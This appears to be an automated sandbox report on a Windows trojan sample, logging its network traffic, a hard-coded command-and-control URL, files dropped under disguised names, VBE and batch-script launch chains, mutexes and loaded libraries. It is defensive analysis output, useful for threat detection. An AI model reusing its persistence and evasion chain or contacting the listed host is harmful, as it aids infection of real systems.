                                    Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 17:33:38 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                    Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 17:33:45 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                    Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 17:33:55 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000009.00000002.1759792480.000000000287D000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000000F.00000002.1875842793.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1943857058.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000001B.00000002.2009516742.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000020.00000002.2076714879.0000000003527000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2189053603.0000000002B07000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002A.00000002.2256531415.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002F.00000002.2323301689.0000000003047000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000034.00000002.2398807825.0000000003017000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2466038255.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000003F.00000002.2531748971.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://206.188.197.24
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000003F.00000002.2531748971.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti
                                    Source: winIntorefruntimebroker.exe, 00000004.00000002.1691880334.0000000004042000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000009.00000002.1759792480.000000000287D000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000000F.00000002.1875842793.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1943857058.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000001B.00000002.2009516742.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000020.00000002.2076714879.0000000003527000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2189053603.0000000002B07000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002A.00000002.2256531415.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002F.00000002.2323301689.0000000003047000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000034.00000002.2398807825.0000000003017000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2466038255.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000003F.00000002.2531748971.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                    System Summary

                                    Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exe Code function: 0_2_002D6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe File created: C:\Windows\INF\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe File created: C:\Windows\INF\e226a7d7102d53
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe File created: C:\Windows\en-GB\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe File created: C:\Windows\en-GB\e226a7d7102d53
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe Code function: String function: 00007FFD9BB094F3 appears 40 times
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exe Code function: String function: 002EEC50 appears 56 times
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exe Code function: String function: 002EEB78 appears 39 times
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exe Code function: String function: 002EF5F0 appears 31 times
                                    Source: 7vP2IvNXqx.exe, 00000000.00000003.1650087687.00000000078DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 7vP2IvNXqx.exe
                                    Source: 7vP2IvNXqx.exe, 00000000.00000003.1649700859.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 7vP2IvNXqx.exe
                                    Source: 7vP2IvNXqx.exe Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 7vP2IvNXqx.exe
                                    Source: 7vP2IvNXqx.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: winIntorefruntimebroker.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Qr2vJkulGbfJGi4ursy.cs Cryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, Qr2vJkulGbfJGi4ursy.cs Cryptographic APIs: 'CreateDecryptor'
                                    Source: classification engine Classification label: mal100.troj.evad.winEXE@114/50@0/1
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exe Code function: 0_2_002D6C74 GetLastError,FormatMessageW
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exe Code function: 0_2_002EA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe File created: C:\Program Files (x86)\windows mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exe File created: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe Mutant created: NULL
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\3461c1a9b46d8f4901f52a2fbe6a3dc2e8631664402195a9c63193388a0b8966
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile created: C:\Users\user\AppData\Local\Temp\6vaca2I0ey
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\yu2eKcIww0WQz1diSHkj97Iay5LLlL45l6P5L9G4ltB7.bat" "
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCommand line argument: sfxname0_2_002EDF1E
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCommand line argument: sfxstime0_2_002EDF1E
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCommand line argument: STARTDLG0_2_002EDF1E
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCommand line argument: xz20_2_002EDF1E
                                    Source: 7vP2IvNXqx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 7vP2IvNXqx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeFile read: C:\Windows\win.ini
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: 7vP2IvNXqx.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeFile read: C:\Users\user\Desktop\7vP2IvNXqx.exe
                                    Source: unknownProcess created: C:\Users\user\Desktop\7vP2IvNXqx.exe "C:\Users\user\Desktop\7vP2IvNXqx.exe"
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\yu2eKcIww0WQz1diSHkj97Iay5LLlL45l6P5L9G4ltB7.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll/winIntorefruntimebroker.exe"
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5K6fCoMBVq.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ECvQfnJznV.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ddp3dI2Wa5.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qlEmwzstBs.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DoC45cXmCX.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GxEp7zFCwB.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UCvjmtCiY3.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bviytIjYVg.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ujuZrulyBl.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nXpNUGu1Ke.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0WKriXx1WO.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: api-ms-win-core-synch-l1-2-0.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: api-ms-win-core-fibers-l1-1-1.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: api-ms-win-core-synch-l1-2-0.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: api-ms-win-core-fibers-l1-1-1.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: api-ms-win-core-localization-l1-2-1.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: version.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: dxgidebug.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: sfc_os.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: dwmapi.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: riched20.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: usp10.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: msls31.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: windowscodecs.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: textshaping.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: textinputframework.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: coremessaging.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: ntmarta.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: propsys.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: edputil.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: urlmon.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: iertutil.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: srvcli.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: netutils.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: policymanager.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: msvcp110_win.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: appresolver.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: bcp47langs.dll
